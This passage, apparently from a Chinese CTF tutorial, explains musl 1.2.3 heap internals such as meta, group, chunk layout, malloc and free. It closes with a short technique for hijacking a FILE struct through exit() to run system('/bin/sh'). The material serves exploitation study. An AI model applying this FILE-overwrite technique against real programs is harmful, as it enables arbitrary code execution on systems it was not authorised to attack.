        cnt >>= 1;
}

// If we selected a count of 1 above but it's not sufficient to use
// mmap, increase to 2. Then it might be; if not it will nest.
if (cnt == 1 && size * cnt + UNIT <= pagesize / 2) cnt = 2;

之后分两种情况。

如果所需内存大于页大小的一半则采用 mmap 的方式获取内存，期间也会对 group 中 chunk 的数量进行调整。注意 active_idx 的初值为 max⁡(0,min⁡(⌊0x2000−16size⌋−1,cnt−1))max(0,min(⌊size0x2000−16⌋−1,cnt−1)) 。

// All choices of size*cnt are "just below" a power of two, so anything
// larger than half the page size should be allocated as whole pages.
if (size * cnt + UNIT > pagesize / 2) {
    // check/update bounce counter to start/increase retention
    // of freed maps, and inhibit use of low-count, odd-size
    // small mappings and single-slot groups if activated.
    int nosmall = is_bouncing(sc);
    account_bounce(sc);
    step_seq();

    // since the following count reduction opportunities have
    // an absolute memory usage cost, don't overdo them. count
    // coarse usage as part of usage.
    if (!(sc & 1) && sc < 32) usage += ctx.usage_by_class[sc + 1];

    // try to drop to a lower count if the one found above
    // increases usage by more than 25%. these reduced counts
    // roughly fill an integral number of pages, just not a
    // power of two, limiting amount of unusable space.
    if (4 * cnt > usage && !nosmall) {
        if (0)
            ;
        else if ((sc & 3) == 1 && size * cnt > 8 * pagesize)
            cnt = 2;
        else if ((sc & 3) == 2 && size * cnt > 4 * pagesize)
            cnt = 3;
        else if ((sc & 3) == 0 && size * cnt > 8 * pagesize)
            cnt = 3;
        else if ((sc & 3) == 0 && size * cnt > 2 * pagesize)
            cnt = 5;
    }
    size_t needed = size * cnt + UNIT;
    needed += -needed & (pagesize - 1);

    // produce an individually-mmapped allocation if usage is low,
    // bounce counter hasn't triggered, and either it saves memory
    // or it avoids eagar slot allocation without wasting too much.
    if (!nosmall && cnt <= 7) {
        req += IB + UNIT;
        req += -req & (pagesize - 1);
        if (req < size + UNIT || (req >= 4 * pagesize && 2 * cnt > usage)) {
            cnt = 1;
            needed = req;
        }
    }

    p = mmap(0, needed, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, -1, 0);
    if (p == MAP_FAILED) {
        free_meta(m);
        return 0;
    }
    m->maplen = needed >> 12;
    ctx.mmap_counter++;
    active_idx = (4096 - UNIT) / size - 1;
    if (active_idx > cnt - 1) active_idx = cnt - 1;
    if (active_idx < 0) active_idx = 0;
}

如果所需内存不超过页大小的一半则在再申请一个所需大小的 chunk，然后在其中构造 group 。与正常申请不同的是这里直接调用 alloc_slot 获取 chunk 的下标，不过和正常申请实际是一样的。在申请的 chunk 的头部要打上标记（p[-3] = (p[-3] & 31) | (6 << 5)）。最后再将 group 中的每个 chunk 的 p[-4] 处置零。

else {
    int j = size_to_class(UNIT + cnt * size - IB);
    int idx = alloc_slot(j, UNIT + cnt * size - IB);
    if (idx < 0) {
        free_meta(m);
        return 0;
    }
    struct meta *g = ctx.active[j];
    p = enframe(g, idx, UNIT * size_classes[j] - IB, ctx.mmap_counter);
    m->maplen = 0;
    p[-3] = (p[-3] & 31) | (6 << 5);
    for (int i = 0; i <= cnt; i++)
        p[UNIT + i * size - 4] = 0;
    active_idx = cnt - 1;
}

最后更新 meta 和 group 的相关字段，从这里可以看到，有的 chunk 对应的 freed_mask 被置 1 ，这些 chunk 暂时参与不到内存分配中。最后将管理申请到的 group 的 meta 返回。

ctx.usage_by_class[sc] += cnt;
m->avail_mask = (2u << active_idx) - 1;
m->freed_mask = (2u << (cnt - 1)) - 1 - m->avail_mask;
m->mem = (void *) p;
m->mem->meta = m;
m->mem->active_idx = active_idx;
m->last_idx = cnt - 1;
m->freeable = 1;
m->sizeclass = sc;
return m;

chunk

musl heap 中的 chunk 没有具体定义，但是根据程序可以分析出 chunk 的结构：

struct chunk {
    uint32_t offset_32;
    uint8_t use_32_offset;
    uint8_t inedx:5;
    uint8_t flag:3;
    uint16_t offset_16;
    char user_data[]
}

由于一般 offset_32 不使用，因此 chunk 结构如下图所示。

offset_32 和 offset_16 都表示 chunk 的 user_data 与所在 group 的 storage 之间的偏移除以 16 ，只不过一个用 32 比特存储一个用 16 比特存储。当申请的 chunk 为该 chunk 内部的一块空间则外部的 chunk 的 offset 为与内部 chunk 的偏移除以 16 。当 chunk 被 free 掉时 offset 被置 0 。
use_32_offset 表示是否用 offset_32 存储偏移。
flag 是 chunk 的标志位。当申请的 chunk 为该 chunk 内部的一块空间则外部的 chunk 的 flag 为 7 ，当申请的 chunk 作为 group 时该 chunk 的 flag 为 6 。正常申请出的 chunk ，该值为 reserved ，其中 reserved 为 user_data 到 chunk 结束位置的距离减去用户申请的内存大小与 5 取 min 的结果。如果 chunk 被 free 掉则 flag 和 index 一并置为 0xFF 。
index 表示该 chunk 在 group 中的下标。当申请的 chunk 为该 chunk 内部的一块空间则外部的 chunk 的 index 为 0 ，内部 chunk 的 index 为外部 chunk 在 group 中的下标。

get_slot_index

获取 chunk 的 index 。

1
2
3

static inline int get_slot_index(const unsigned char *p) {
    return p[-3] & 31;
}

get_nominal_size

获取 chunk 中 user_data 的大小，具体原理见下面对 enframe 和 set_size 函数的分析。

static inline size_t get_nominal_size(const unsigned char *p, const unsigned char *end) {
    size_t reserved = p[-3] >> 5;
    if (reserved >= 5) {
        assert(reserved == 5);
        reserved = *(const uint32_t *) (end - 4);
        assert(reserved >= 5);
        assert(!end[-5]);
    }
    assert(reserved <= end - p);
    assert(!*(end - reserved));
    // also check the slot's overflow byte
    assert(!*end);
    return end - reserved - p;
}

get_meta

首先获取 chunk 的 offset 和 index ，然后根据 offset 得到 chunk 对应 group 的地址，之后根据 group 获得 meta 。

assert(!((uintptr_t) p & 15));
int offset = *(const uint16_t *) (p - 2);
int index = get_slot_index(p);
if (p[-4]) {
    assert(!offset);
    offset = *(uint32_t *) (p - 8);
    assert(offset > 0xffff);
}
const struct group *base = (const void *) (p - UNIT * offset - UNIT);
const struct meta *meta = base->meta;

之后对 meta 和 chunk 进行相关检查，防止伪造 chunk 。通过检查后返回得到的 meta 。

assert(meta->mem == base);
assert(index <= meta->last_idx);
assert(!(meta->avail_mask & (1u << index)));
assert(!(meta->freed_mask & (1u << index)));
const struct meta_area *area = (void *) ((uintptr_t) meta & -4096);
assert(area->check == ctx.secret);
if (meta->sizeclass < 48) {
    assert(offset >= size_classes[meta->sizeclass] * index);
    assert(offset < size_classes[meta->sizeclass] * (index + 1));
} else {
    assert(meta->sizeclass == 63);
}
if (meta->maplen) {
    assert(offset <= meta->maplen * 4096UL / UNIT - 1);
}
return (struct meta *) meta;

函数分析

malloc

首先检查申请的内存是否溢出。

1	if (size_overflows(n)) return 0;

如果申请的内存大于 131052 字节则采用直接 mmap 的方式申请。

if (n >= MMAP_THRESHOLD) {
    size_t needed = n + IB + UNIT;
    void *p = mmap(0, needed, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, -1, 0);
    if (p == MAP_FAILED) return 0;
    wrlock();
    step_seq();
    g = alloc_meta();
    if (!g) {
        unlock();
        munmap(p, needed);
        return 0;
    }
    g->mem = p;
    g->mem->meta = g;
    g->last_idx = 0;
    g->freeable = 1;
    g->sizeclass = 63;
    g->maplen = (needed + 4095) / 4096;
    g->avail_mask = g->freed_mask = 0;
    // use a global counter to cycle offset in
    // individually-mmapped allocations.
    ctx.mmap_counter++;
    idx = 0;
    goto success;
}

否则先计算出申请的内存大小所在的组并取出对应组的 deque 中 ctx.active[sc] 指向的那个 meta 。

1
2
3

sc = size_to_class(n);
rdlock();
g = ctx.active[sc];

其中 size_to_class 定义如下：

static inline int size_to_class(size_t n) {
    n = (n + IB - 1) >> 4;
    if (n < 10) return n;
    n++;
    int i = (28 - a_clz_32(n)) * 4 + 8;
    if (n > size_classes[i + 1]) i += 2;
    if (n > size_classes[i]) i++;
    return i;
}

该代码等价于下面的 C++ 代码，只不过根据数据特性进行了复杂度的优化。

1	std::lower_bound(size_classes, size_classes + 48, (n + IB - 1) >> 4) - size_classes;

对应组的 deque 为空则根据经验进行一些调整。

// use coarse size classes initially when there are not yet
// any groups of desired size. this allows counts of 2 or 3
// to be allocated at first rather than having to start with
// 7 or 5, the min counts for even size classes.
if (!g && sc >= 4 && sc < 32 && sc != 6 && !(sc & 1) && !ctx.usage_by_class[sc]) {
    size_t usage = ctx.usage_by_class[sc | 1];
    // if a new group may be allocated, count it toward
    // usage in deciding if we can use coarse class.
    if (!ctx.active[sc | 1] || (!ctx.active[sc | 1]->avail_mask && !ctx.active[sc | 1]->freed_mask))
        usage += 3;
    if (usage <= 12)
        sc |= 1;
    g = ctx.active[sc];
}

之后从尝试在该 meta 中获取一个空闲 chunk 的下标，如果成功则更新 avail_mask 后直接跳转到 success 否则跳出循环。

for (;;) {
    mask = g ? g->avail_mask : 0;
    first = mask & -mask;
    if (!first) break;
    if (RDLOCK_IS_EXCLUSIVE || !MT)
        g->avail_mask = mask - first;
    else if (a_cas(&g->avail_mask, mask, mask - first) != mask)
        continue;
    idx = a_ctz_32(first);
    goto success;
}
upgradelock();

如果 meta 没有空闲 chunk 则调用 alloc_slot 获取一个有空闲 chunk 的 meta 然后让 ctx.active 对应的 deque 头指向这个 meta 。

idx = alloc_slot(sc, n);
if (idx < 0) {
    unlock();
    return 0;
}
g = ctx.active[sc];

最后如果成功获取空闲 chunk 的下标则调用 enframe 函数将该 chunk 取出。

success:
    ctr = ctx.mmap_counter;
    unlock();
    return enframe(g, idx, n, ctr);

alloc_slot

static int alloc_slot(int sc, size_t req) {
    uint32_t first = try_avail(&ctx.active[sc]);
    if (first) return a_ctz_32(first);

    struct meta *g = alloc_group(sc, req);
    if (!g) return -1;

    g->avail_mask--;
    queue(&ctx.active[sc], g);
    return 0;
}

首先调用 try_avail 获取一个有空闲 chunk 的 meta 然后让让 ctx.active 对应的 deque 头指向这个 meta ，否则调用 alloc_group 申请一个新的 group 并且将这个 group 对应的 meta 加入到 deque 中（此时 deque 中就这一个 meta 因此 ctx.active 对应的 deque 头指向这个 meta ）。

try_avail

首先如果 deque 为空则直接返回 0 。

1
2
3

struct meta *m = *pm;
uint32_t first;
if (!m) return 0;

如果没有可用的 chunk 则尝试获取一个有可用 chunk 的 meta 并将它连到 deque 头，最后从其中获取一个下标最小的可用 chunk 更新 avail_mask 并返回下标。

uint32_t mask = m->avail_mask;
if (!mask) {...}
first = mask & -mask;
m->avail_mask = mask - first;
return first;

如果当前的 meta 既没有空闲的 chunk 也没有释放的 chunk 则直接将该 meta 从 deque 中取出。为了充分利用空闲的 chunk ，无论当前 meta 有没有释放的 chunk 都会将 deque 的头指向下一个 meta 。另外如果 deque 为空会返回 0 。如果是正常情况如果有下一个 meta 则下一个 meta 一定会有可用或释放的 chunk 。

if (!m->freed_mask) {
    dequeue(pm, m);
    m = *pm;
    if (!m) return 0;
} else {
    m = m->next;
    *pm = m;
}

如果下一个 meta 全部都是释放的 chunk 那么本着充分利用空闲 chunk 的原则会将 deque 的头指向下一个 meta 。

mask = m->freed_mask;

// skip fully-free group unless it's the only one
// or it's a permanently non-freeable group
if (mask == (2u << m->last_idx) - 1 && m->freeable) {
    m = m->next;
    *pm = m;
    mask = m->freed_mask;
}

如果当前 chunk 的 active_idx 范围内没有释放的 chunk 则尽可能选择下一个 chunk 否则根据经验扩大 active_idx 的范围，最后调用 activate_group 函数将 active_idx 范围内释放的 chunk 转换为空闲的 chunk。

    // activate more slots in a not-fully-active group
    // if needed, but only as a last resort. prefer using
    // any other group with free slots. this avoids
    // touching & dirtying as-yet-unused pages.
    if (!(mask & ((2u << m->mem->active_idx) - 1))) {
        if (m->next != m) {
            m = m->next;
            *pm = m;
        } else {
            int cnt = m->mem->active_idx + 2;
            int size = size_classes[m->sizeclass] * UNIT;
            int span = UNIT + size * cnt;
            // activate up to next 4k boundary
            while ((span ^ (span + size - 1)) < 4096) {
                cnt++;
                span += size;
            }
            if (cnt > m->last_idx + 1)
                cnt = m->last_idx + 1;
            m->mem->active_idx = cnt - 1;
        }
    }
    mask = activate_group(m);
    assert(mask);
    decay_bounces(m->sizeclass);
}

enframe

首先计算出 chunk 的起始和结束地址。

size_t stride = get_stride(g);
size_t slack = (stride - IB - n) / UNIT;
unsigned char *p = g->mem->storage + stride * idx;
unsigned char *end = p + stride - IB;

其中 get_stride 函数是计算出 meta 中 chunk 的大小。

static inline size_t get_stride(const struct meta *g) {
    if (!g->last_idx && g->maplen) {
        return g->maplen * 4096UL - UNIT;
    } else {
        return UNIT * size_classes[g->sizeclass];
    }
}

为了增大利用难度，用户使用的内存区域会在原有 chunk 的位置后加一个随机的偏移 off ，这个随机值是通过 ctr（ctx.mmap_counter）， chunk 的 offset 以及剩余区域大小计算出来的。之后在原有 chunk 的 idx 字段打上 7 << 5 标记，并且将 p 指针后移 UNIT * off 字节。

// cycle offset within slot to increase interval to address
// reuse, facilitate trapping double-free.
int off = (p[-3] ? *(uint16_t *) (p - 2) + 1 : ctr) & 255;
assert(!p[-4]);
if (off > slack) {
    size_t m = slack;
    m |= m >> 1;
    m |= m >> 2;
    m |= m >> 4;
    off &= m;
    if (off > slack) off -= slack + 1;
    assert(off <= slack);
}
if (off) {
    // store offset in unused header at offset zero
    // if enframing at non-zero offset.
    *(uint16_t *) (p - 2) = off;
    p[-3] = 7 << 5;
    p += UNIT * off;
    // for nonzero offset there is no permanent check
    // byte, so make one.
    p[-4] = 0;
}

最后如下图所示设置相关字段信息。

static inline void set_size(unsigned char *p, unsigned char *end, size_t n) {
    int reserved = end - p - n;
    if (reserved) end[-reserved] = 0;
    if (reserved >= 5) {
        *(uint32_t *) (end - 4) = reserved;
        end[-5] = 0;
        reserved = 5;
    }
    p[-3] = (p[-3] & 31) + (reserved << 5);
}

    *(uint16_t *) (p - 2) = (size_t) (p - g->mem->storage) / UNIT;
    p[-3] = idx;
    set_size(p, end, n);
    return p;

free

p 为空直接返回，否则获取 chunk 对应的 meta ，index 和 group 中 chunk 的大小，根据这些信息计算出 chunk 的起始和结束位置。

if (!p) return;

struct meta *g = get_meta(p);
int idx = get_slot_index(p);
size_t stride = get_stride(g);
unsigned char *start = g->mem->storage + stride * idx;
unsigned char *end = start + stride - IB;
get_nominal_size(p, end);
uint32_t self = 1u << idx, all = (2u << g->last_idx) - 1;

将 chunk 的 index 和 flag 一并置为 0xFF ，offset 置为 0 。

((unsigned char *) p)[-3] = 255;
// invalidate offset to group header, and cycle offset of
// used region within slot if current offset is zero.
*(uint16_t *) ((char *) p - 2) = 0;

如果释放的 chunk 的起始和结束地址差至少 2 个内存页则释放的 chunk 必然包含一个内存页，因此将 chunk 包含的所有完整物理页调用 madvise 设置 lazyfree 标志，这样在内存紧缺的时候会回收这些物理页。

// release any whole pages contained in the slot to be freed
// unless it's a single-slot group that will be unmapped.
if (((uintptr_t) (start - 1) ^ (uintptr_t) end) >= 2 * PGSZ && g->last_idx) {
    unsigned char *base = start + (-(uintptr_t) start & (PGSZ - 1));
    size_t len = (end - base) & -PGSZ;
    if (len) {
        int e = errno;
        madvise(base, len, MADV_FREE);
        errno = e;
    }
}

如果加上将要释放的 chunk 该 group 中的所有 chunk 要么被释放要么空闲则跳出循环，否则更新 freed_mask 并返回。

// atomic free without locking if this is neither first or last slot
for (;;) {
    uint32_t freed = g->freed_mask;
    uint32_t avail = g->avail_mask;
    uint32_t mask = freed | avail;
    assert(!(mask & self));
    if (!freed || mask + self == all) break;
    if (!MT)
        g->freed_mask = freed + self;
    else if (a_cas(&g->freed_mask, freed, freed + self) != freed)
        continue;
    return;
}

如果跳出循环则会调用 nontrivial_free 释放 group 并返回需要 munmap 的内存的起始地址和大小，之后调用 munmap 释放这块内存。

wrlock();
struct mapinfo mi = nontrivial_free(g, idx);
unlock();
if (mi.len) {
    int e = errno;
    munmap(mi.base, mi.len);
    errno = e;
}

nontrivial_free

如果加上将要释放的 chunk 该 group 中的所有 chunk 要么被释放要么空闲并且 group 是可以释放的则首先判断 meta 是否在 active 这个 deque 中，如果在的话会将该 meta 从 deque 中取出。如果取出这个操作改变了 active 指针则将 active 当前指向的 meta 对应的 group 中的 chunk 调用 activate_group 函数激活。之后调用 free_group 将 chunk 所在的 group 释放并返回需要 munmap 的内存。

uint32_t self = 1u << i;
int sc = g->sizeclass;
uint32_t mask = g->freed_mask | g->avail_mask;

if (mask + self == (2u << g->last_idx) - 1 && okay_to_free(g)) {
    // any multi-slot group is necessarily on an active list
    // here, but single-slot groups might or might not be.
    if (g->next) {
        assert(sc < 48);
        int activate_new = (ctx.active[sc] == g);
        dequeue(&ctx.active[sc], g);
        if (activate_new && ctx.active[sc])
            activate_group(ctx.active[sc]);
    }
    return free_group(g);
}

如果该 chunk 所在的 meta 既没有释放的 chunk 也没有空闲的 chunk 则将该 meta 加入到 active 中。最后更新 freed_mask 。

else if (!mask) {
    assert(sc < 48);
    // might still be active if there were no allocations
    // after last available slot was taken.
    if (ctx.active[sc] != g) {
        queue(&ctx.active[sc], g);
    }
}
a_or(&g->freed_mask, self);
return (struct mapinfo){0};

free_group

首先更新 usage_by_class 。如果 group 是 mmap 得到的则返回 group 对应内存，否则调用 nontrivial_free 释放 group 所在的 chunk 。之后将 meta 释放。

static struct mapinfo free_group(struct meta *g) {
    struct mapinfo mi = {0};
    int sc = g->sizeclass;
    if (sc < 48) {
        ctx.usage_by_class[sc] -= g->last_idx + 1;
    }
    if (g->maplen) {
        step_seq();
        record_seq(sc);
        mi.base = g->mem;
        mi.len = g->maplen * 4096UL;
    } else {
        void *p = g->mem;
        struct meta *m = get_meta(p);
        int idx = get_slot_index(p);
        g->mem->meta = 0;
        // not checking size/reserved here; it's intentionally invalid
        mi = nontrivial_free(m, idx);
    }
    free_meta(g);
    return mi;
}

group 可以被释放的条件如下：

static int okay_to_free(struct meta *g) {
    int sc = g->sizeclass;

    if (!g->freeable) return 0;

    // always free individual mmaps not suitable for reuse
    if (sc >= 48 || get_stride(g) < UNIT * size_classes[sc])
        return 1;

    // always free groups allocated inside another group's slot
    // since recreating them should not be expensive and they
    // might be blocking freeing of a much larger group.
    if (!g->maplen) return 1;

    // if there is another non-full group, free this one to
    // consolidate future allocations, reduce fragmentation.
    if (g->next != g) return 1;

    // free any group in a size class that's not bouncing
    if (!is_bouncing(sc)) return 1;

    size_t cnt = g->last_idx + 1;
    size_t usage = ctx.usage_by_class[sc];

    // if usage is high enough that a larger count should be
    // used, free the low-count group so a new one will be made.
    if (9 * cnt <= usage && cnt < 20)
        return 1;

    // otherwise, keep the last group in a bouncing class.
    return 0;
}

堆利用

unlink

exp

IO_FILE 利用

00000000 struct _IO_FILE // sizeof=0xE8
00000000 {                                       // XREF: FILE/r _IO_FILE_0/r
00000000     unsigned int flags;                 // XREF: gets+C4/r
00000004     // padding byte
00000005     // padding byte
00000006     // padding byte
00000007     // padding byte
00000008     unsigned __int8 *rpos;              // XREF: locking_getc_1+54/r
00000008                                         // locking_getc_1:loc_848A8/w ...
00000010     unsigned __int8 *rend;              // XREF: locking_getc_1+58/r
00000010                                         // locking_getc_1+C4/r ...
00000018     int (*close)(FILE *);
00000020     unsigned __int8 *wend;              // XREF: locking_putc_1+70/r
00000020                                         // putchar+68/r ...
00000028     unsigned __int8 *wpos;              // XREF: locking_putc_1+6C/r
00000028                                         // locking_putc_1+7C/w ...
00000030     unsigned __int8 *mustbezero_1;
00000038     unsigned __int8 *wbase;
00000040     size_t (*read)(FILE *, unsigned __int8 *, size_t);
00000048     size_t (*write)(FILE *, const unsigned __int8 *, size_t);
00000050     off_t (*seek)(FILE *, off_t, int);
00000058     unsigned __int8 *buf;
00000060     size_t buf_size;
00000068     FILE *prev;
00000070     FILE *next;
00000078     int fd;
0000007C     int pipe_pid;
00000080     __int64 lockcount;
00000088     int mode;                           // XREF: psignal+74/r
00000088                                         // psignal:loc_7E130/w ...
0000008C     volatile int lock;                  // XREF: __getopt_msg+48/r
0000008C                                         // psignal+48/r ...
00000090     int lbf;                            // XREF: locking_putc_1+5C/r
00000090                                         // locking_putc_1+FC/r ...
00000094     // padding byte
00000095     // padding byte
00000096     // padding byte
00000097     // padding byte
00000098     void *cookie;
000000A0     off_t off;
000000A8     char *getln_buf;
000000B0     void *mustbezero_2;
000000B8     unsigned __int8 *shend;
000000C0     off_t shlim;
000000C8     off_t shcnt;
000000D0     FILE *prev_locked;
000000D8     FILE *next_locked;
000000E0     __locale_struct *locale;            // XREF: psignal+6C/r
000000E0                                         // psignal+B8/w ...
000000E8 };

000000E8 typedef _IO_FILE _IO_FILE_0;            // XREF: FILE_0/r

exit 调用链

分析 exit 函数的调用链，发现最终会调用

FILE *volatile __stdin_used = &__stdin_FILE;
FILE *volatile __stdout_used = &__stdout_FILE;
FILE *volatile __stderr_used = &__stderr_FILE;

_Noreturn void exit(int code) {
    __funcs_on_exit();
    __libc_exit_fini();
    __stdio_exit();
    _Exit(code);
}

void __stdio_exit(void) {
    FILE *f;
    for (f = *__ofl_lock(); f; f = f->next) close_file(f);
    close_file(__stdin_used);
    close_file(__stdout_used);
    close_file(__stderr_used);
}

static void close_file(FILE *f) {
    if (!f) return;
    FFINALLOCK(f);
    if (f->wpos != f->wbase) f->write(f, 0, 0);
    if (f->rpos != f->rend) f->seek(f, f->rpos - f->rend, SEEK_CUR);
}

总结来说，就是在无沙箱时，需要修改 _IO_FILE 结构体的几个地方：

起始位置写入 /bin/sh
f->wpos 、f->wbase 中其中之一使得二者不等
write 写入 system 函数地址。
最好将 lock 设置为小于 0 避免程序卡死在 __lockfile 函数中。（等于 0 貌似也可以）

FFINALLOCK(f);
//定义:  
#define FFINALLOCK(f) ((f)->lock >= 0 ? __lockfile((f)) : 0)
//替换:  
((f)->lock >= 0 ? __lockfile((f)) : 0)

puts 调用链

分析 puts 函数的调用链，发现最终会调用

int puts(const char *s) {
    int r;
    FLOCK(stdout);
    r = -(fputs(s, stdout) < 0 || putc_unlocked('\n', stdout) < 0);
    FUNLOCK(stdout);
    return r;
}

int fputs(const char *restrict s, FILE *restrict f) {
    size_t l = strlen(s);
    return (fwrite(s, 1, l, f) == l) - 1;
}

size_t fwrite(const void *restrict src, size_t size, size_t nmemb, FILE *restrict f) {
    size_t k, l = size * nmemb;
    if (!size) nmemb = 0;
    FLOCK(f);
    k = __fwritex(src, l, f);
    FUNLOCK(f);
    return k == l ? nmemb : k / size;
}

int __towrite(FILE *f) {
    ...
    if (f->flags & F_NOWR) {
        f->flags |= F_ERR;
        return EOF;
    }
    ...
    return 0;
}

size_t __fwritex(const unsigned char *restrict s, size_t l, FILE *restrict f) {
    size_t i = 0;

    if (!f->wend && __towrite(f)) return 0;

    if (l > f->wend - f->wpos) return f->write(f, s, l);
    ...
}

深入理解Pwn_musl及相关例题

Musl heap (musl-1.2.0)

数据结构

mal

bin

chunk

宏定义

unbin

alloc_fwd & alloc_rev

函数分析

malloc

expand_heap

__expand_heap

pretrim

trim

free

__bin_chunk

堆利用

unlink

exp

IO_FILE 利用

exit 调用链

puts 调用链

exp

Musl heap (musl-1.2.3)

数据结构

deque

queue

dequeue

dequeue_head

malloc_context

meta_area

meta

get_stride

free_meta

alloc_meta

group

alloc_group

chunk

get_slot_index

get_nominal_size

get_meta

函数分析

malloc

alloc_slot

try_avail

enframe

free

nontrivial_free

free_group

堆利用

unlink

exp

IO_FILE 利用

exit 调用链

puts 调用链

exp